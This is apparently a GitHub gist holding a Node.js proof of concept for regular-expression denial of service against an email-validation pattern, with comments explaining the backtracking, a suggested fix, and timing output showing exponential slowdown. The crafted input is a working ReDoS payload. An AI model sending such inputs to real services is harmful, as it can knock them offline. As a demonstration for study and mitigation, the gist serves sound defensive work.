
@evilpacket
Created October 25, 2015 04:56
Shitty ReDoS POC
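/**
 * Build a filler string by repeating `chr`.
 *
 * The loop bound is inclusive, so the result holds `len + 1` copies of
 * `chr`, not `len`. That is kept as-is because the LENGTH values printed by
 * the driver loop depend on it.
 *
 * @param {number} len - Highest loop index; `len + 1` copies are appended.
 * @param {string} chr - Text to repeat.
 * @returns {string} `chr` repeated `len + 1` times.
 */
var genstr = function (len, chr) {
  var result = "";
  // Declare the counter locally. As an undeclared name it became a global
  // shared with any caller that also uses a global `i`, and it throws a
  // ReferenceError in strict mode / ES modules.
  for (var i = 0; i <= len; i++) {
    result += chr;
  }
  return result;
};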
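// Email-style pattern under test, kept exactly as published.
// The trailing group `([a-z0-9]{2,4})+` is a bounded repeat inside an
// unbounded repeat: a run of letters can be split into chunks of 2-4 in many
// different ways. When the input cannot match (here it ends in "{", which `$`
// rejects), a backtracking engine tries those splits one after another, so
// match time grows steeply with the length of the run.
// Mitigation for code using a pattern like this: `[a-z0-9]{2,}$` accepts the
// same strings as `([a-z0-9]{2,4})+$` without the ambiguity, and the input
// length should be capped before matching.
var r = /^([a-z0-9_\.\-\+])+\@(([a-z0-9\-])+\.)+([a-z0-9]{2,4})+$/;

// Stop once a single match takes this many seconds. The growth is already
// visible by then, and each later step would take longer again.
var MAX_SECONDS_PER_TEST = 5;

// The original used one undeclared global `i` for both this loop and the
// loop inside genstr, so every pass advanced it twice. A separately named
// counter with an explicit step of 2 reproduces the recorded COUNT sequence
// (1, 3, 5, ...) without relying on that side effect.
for (var count = 1; count <= 10000000; count += 2) {
  console.log("COUNT: " + count);
  // "t@7." satisfies the local part and one domain label; the filler run then
  // lands in the trailing group, and "{" forces the overall match to fail.
  var str = "t@" + "7." + genstr(count, 't') + "{";
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  console.log(r.test(str));
  // process.hrtime(start) yields the elapsed time as [seconds, nanoseconds].
  var end = process.hrtime(start);
  console.log(end);
  if (end[0] >= MAX_SECONDS_PER_TEST) {
    break;
  }
}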
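// Result: each [seconds, nanoseconds] pair is the process.hrtime() time of one r.test() call; the listing ends partway through COUNT 51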
COUNT: 1
LENGTH: 7
false
[ 0, 803688 ]
COUNT: 3
LENGTH: 9
false
[ 0, 141871 ]
COUNT: 5
LENGTH: 11
false
[ 0, 32618 ]
COUNT: 7
LENGTH: 13
false
[ 0, 25082 ]
COUNT: 9
LENGTH: 15
false
[ 0, 28394 ]
COUNT: 11
LENGTH: 17
false
[ 0, 25384 ]
COUNT: 13
LENGTH: 19
false
[ 0, 26710 ]
COUNT: 15
LENGTH: 21
false
[ 0, 29386 ]
COUNT: 17
LENGTH: 23
false
[ 0, 40314 ]
COUNT: 19
LENGTH: 25
false
[ 0, 54110 ]
COUNT: 21
LENGTH: 27
false
[ 0, 78012 ]
COUNT: 23
LENGTH: 29
false
[ 0, 149074 ]
COUNT: 25
LENGTH: 31
false
[ 0, 250270 ]
COUNT: 27
LENGTH: 33
false
[ 0, 400358 ]
COUNT: 29
LENGTH: 35
false
[ 0, 894745 ]
COUNT: 31
LENGTH: 37
false
[ 0, 1805014 ]
COUNT: 33
LENGTH: 39
false
[ 0, 4054987 ]
COUNT: 35
LENGTH: 41
false
[ 0, 9596726 ]
COUNT: 37
LENGTH: 43
false
[ 0, 18652895 ]
COUNT: 39
LENGTH: 45
false
[ 0, 39708166 ]
COUNT: 41
LENGTH: 47
false
[ 0, 83203249 ]
COUNT: 43
LENGTH: 49
false
[ 0, 166302383 ]
COUNT: 45
LENGTH: 51
false
[ 0, 370137148 ]
COUNT: 47
LENGTH: 53
false
[ 0, 773351122 ]
COUNT: 49
LENGTH: 55
false
[ 1, 689719124 ]
COUNT: 51
LENGTH: 57